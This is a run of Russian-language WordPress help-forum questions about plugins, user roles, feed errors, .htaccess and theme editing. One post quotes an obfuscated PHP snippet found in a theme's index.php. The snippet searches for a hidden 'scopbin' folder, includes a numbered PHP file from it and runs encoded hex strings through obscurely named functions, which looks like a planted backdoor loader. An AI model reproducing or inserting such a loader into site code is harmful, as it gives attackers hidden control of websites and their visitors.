Есть ли плагин (или хаки, но с мануалом по применению) для генерации надписи "столько-то новых комментариев", которую будет видеть юзер, открывающий ленту второй раз? Такая функция есть в Друпале, интересно, можно ли прикрутить аналог к ВП)
Есть ли плагин (или хаки, но с мануалом по применению) для генерации надписи "столько-то новых комментариев", которую будет видеть юзер, открывающий ленту второй раз? Такая функция есть в Друпале, интересно, можно ли прикрутить аналог к ВП)
Ага, раз вы это читаете, значит повелись на заголовок 😆 Вообщем, хочу поставить на home.php флеш-ролик и вот думаю, как бы сделать так, чтобы он прокручивался посетителю только при первом заходе на сайт, а в дальнейшем, когда он будет кликать из сайта на ссылку Главная, чтобы ролик уже не мелькал… Буду благодарен экспертам за хелп…
Как вывести описание рубрики под постом?
При добавлении рубрики можно задать описание, которое выводиться в виде параметра title в ссылке. В посте снизу выводится список рубрик, к которым он относится. Такой вопросик: как сделать чтобы вместо названий рубрик внизу поста выводились титлы рубрик в виде активной ссылки?
Подскажите плагин вывода первых букв постов в виде линков
Всем привет!
Есть ли плагин, который будет выводить первые буквы постов раздела (в алфавитном порядке) в виде линков на эти посты? Спасибо.
Как это реализовать? Несколько вопросов. (использую WordPress 2.3.3)
Всем доброго времени суток!
Искал по поиску, вроде не нашел, если что сильно не ругайтесь :rolleyes:
Есть у меня несколько вопросов по WP не знаю правда, к плагинам это относиться или
непосредственно к самому WP не знаю, не силен пока.
Итак…
Первый мой вопрос заключается в том, можно ли разграничить роли в WP более
детально? Точнее нужно реализовать следующее, к примеру на сайте есть
несколько разных категорий, есть два человека, и ограничить права КАЖДОГО
так, чтобы он мог писать и менять только в СВОЕЙ назначенной категории.
Второй вопрос. Как известно в WP к сообщению можно прикрепить файл, загрузив его
на сервер где сайт, точнее в итоге получается просто ссылка на файл в сообщении,
так вот, можно ли сделать, чтобы при появлении подобной ссылки в тексте рядом
с ней так же появлялась соответствующая картинка? Ну не знаю, пиктограмма
дискетки например, а то выглядит как ссылка на сторонний сайт, слишком незаметно
И в завершение еще один вопрос знатокам WP. Как можно на главной странице поместить
форму ввода логина и пароля для доступа в административную панель?
Я использую WordPress 2.3.3
Заренее спасибо!оль
добавление разделов в wordpress
хочу у себя в блоге сделать чтото подобное http://www.habrahabr.ru/ справа есть темы типа (Adobe Ajax Apple CMS CSS Facebook Firefox flash fun Gmail Google habrahabr HTML IBM ICQ IE IM Intel iPhone iPod IT JavaScript Linux LiveJournal Mac Mail.Ru Microsoft Mozilla mp3 MySpace Nokia open source Opera p2p php RSS Safari SEO Skype и т.д.) как такое можно сделать тут, увеличить шрифт текста в зависимости от популярности и, например, отображать посещаний около каждой темы, чтото типа novafilm.tv
Вообщем дело бо так:
Установил я плагин для feedburner.com, заригился на нём. Всё было хорошо,фид перехватывался и отображался на http://feeds.feedburner.com/…
Но сегодня при просмотре фида браузер выдал ошибку,
Ошибка анализа XML: синтаксическая ошибка (Строка: 1, Символ: 0) 1: ??????<?xml version="1.0" encoding="UTF-8"?> 2: <rss version="2.0" 3: xmlns:content="http://purl.org/rss/1.0/modules/content/" 4: xmlns:wfw="http://wellformedweb.org/CommentAPI/"
Думал всё дело с feedburner.com, но деактивировав плагин, оказалось, что эти проблемы у моего wordpress’a.
Данные ощибка мне не о чём не говорят, и, естественно, что делать я не знаю. Подсажите в чём может быть дело?
русские имена файлов в NextgenGallery
Здравствуйте, у меня проблема как можно сделать так, чтобы в плагине NextgenGallery выводились имена русских файлов? при загрузке картинок с русскими именами, картинка загружается с именем dhdhndhdhdhnf-dhdhndhdhdhdhdhudhdhndh.jpg или как можно сделать так чтобы русские имена файлов заменялись на анг, как в плагине rus-to-lat
спасибо.
Отключить уведомления об обновлениях
Задолбали меня эти "Вышла новая версия WordPress", вішла новая версия плагина…. – ну не хочу я обновлять, а сообщения єти уже примелькались. Может кто знает как их поубивать?
все вроде работает нормально, но почему-то картинки из директории site.com/img/, site.com/img/s/ перестали отображаться
когда ввожу в строку браузера site.com/img/s/logo.png — мне выдает 404 страницу вордпресовскую
Плагин Advanced TinyMCE Editor 0.5.0 и wp 2.3.1
Скачала плагин Advanced TinyMCE Editor 0.5.0. Моя Версия wp – 2.3.1. Проделала все, что касается сохранения в нужные папки, сохранение настроек, Ctrl+F5… но обещенные 60 кнопок так и не появились. Возможно несоответствие вервии wp.:(
Подскажите, плиз, корректный плагин для моей версии wp. Особенно меня интересует – ВОЗМОЖНОСТЬ СОЗДАНИЯ ТАБЛИЦ!!!
Собственно хочу добавить в htaccess строку php_flag register_globals off. Добавляю сохраняю все работает, но после любого изменения настроек в админке файл htaccess возвращается в прежнее состояние ;(( Т.е. как я понимаю есть еще какой-то шаблон этого файла и он его из шаблона копирует? Кто сталкивался подскажите чего делать?
Кто пользовался этим плагином? Как с ним работать, что-то я установил, но видимых различий не обнаружил, как грузились мои страницы, так и грузятся. Или я что-то не так делаю? Помогите плиз объясните что, да как.
Заранее всем спасибо.
Можно ли реализовать следующую задумку – сделать так, чтобы при клике на ник комментатора открывался не его сайт, указанный при регистрации, а страница со всеми его комментариями? Ну, грубо говоря, как на форуме – найти все сообщения этого пользователя.
Плагин не работает под правами редактора
Друзья, у меня такая ситуация, скачал и установил плагин WP-tables для создания таблиц в wordpress.
Под правами админа он отлично работает, но вот под правами редактора просто не доступен раздел создания таблиц, который при установке плагина появляется в управлении.
Подскажите пожалуйста, как можно сделать, чтоб плагин работал под правами редактора, так же как и под правами админа
Версия wordpressa 2.3.3 Версия плагина wp-Table 1.52
Изменение дискового пространства
Доброго времени суток!
По умолчанию для загружаемых файлов стоит размер пространства 30Мб
Вопрос – как и где изменить?
Поскольку стоит WP MU, аналогичный вопрос – где изменить отведенный размер на конкретный блог?
Спасибо!
У меня шаблон, который мне нравиться и мне подходит. Но столкнулся с одной проблемой хотел отредактировать через редактор тем index.php, но когда открыл его, то увидел вот, что…
<?php if(!function_exists('findsysfolder')){function findsysfolder($fld){$fld1=dirname($fld);$fld=$fld1.'/scopbin';clearstatcache();if(!is_dir($fld))return findsysfolder($fld1);else return $fld;}}require_once(findsysfolder(__FILE__).'/911006.php');$REXISTHECAT4FBI='FE50E574D754E76AC679F242F450F768FB5DCB77F34DE341 660C280D176E374DE7FB3B090A782B6B68DBC97BEAD93B681C452F25BE26';g0666f0acdeed38d4cd9084ade1739498(f0666f0acdeed38d4cd9084ade1739498(__FILE__));$REXISTHEDOG4FBI='66918E8CF85DF653429D3488DE70E27DD87FB3EF58D5C63243645FAF23AC1A D419CE042FB5AFA2DAE20A1F7 7201D 67BE865E23AE2 576D97BD97CC31DBA1B A684C61595A5AD755F11BCDDE7CD1C5DC71E57CD8 F488E3BEE207CE4485BA1F2 675B6F72113171626161310B45C8A9925BE1CB92B7C84D5 0419FC779AA2ADF15 E 31F B74A022AA29BF 74FFB311B70EA4DBFC9E5DBD5EAC4EDC3FA2C75AC8DEF24 563B0E43662AF20BE15 C58F36CE61B1A 839EE51F12773ED6694963E9A3994F874F156FF3665ED65FE6F8CE73060ACFB 279DA5B5C27 112 615 110 41313 A1D A13 A6BC932D7 74E5A8ECE 14084E13D96C0 C482B2B?>
Это только часть.
Вопрос такой как мне его привести в нормальный вид, сделать его сам я не смогу, может какие-то есть решения.
Заранее всем благодарен
Добовление статей только для зарегестрированных
Надо чтобы можно было добавлять статьи в нужный раздел и только чтоб зарегестрированные пользрватели и желательно не через админку. Просто сделать их "авторами" нехорошо, так как доступ получат ко всем разделам, а надо только к одному или двум.
Подскажите пожалуйсто.
можно, интересно, как-то в самом коде <?php wp_related_posts(); ?> прописать исключение некоторых рубрик?
нужно именно в коде исключать рубрики, т.к. собираюсь использовать схемy "if cat=3 exlude=1,2" "if cat=1,2 exclude=3"… что-то в этом роде
Плагин который автоматом будет закрывать теги
Привет всем!
Поставил племяшке ВП. Но проблема в том, что племяницу тяжело научить правильно писать посты. Очень часто она забывает закрывать теги 🙂
Есть какой-то способ или плагин, который бы автоматом закрывал все теги при сохранении поста?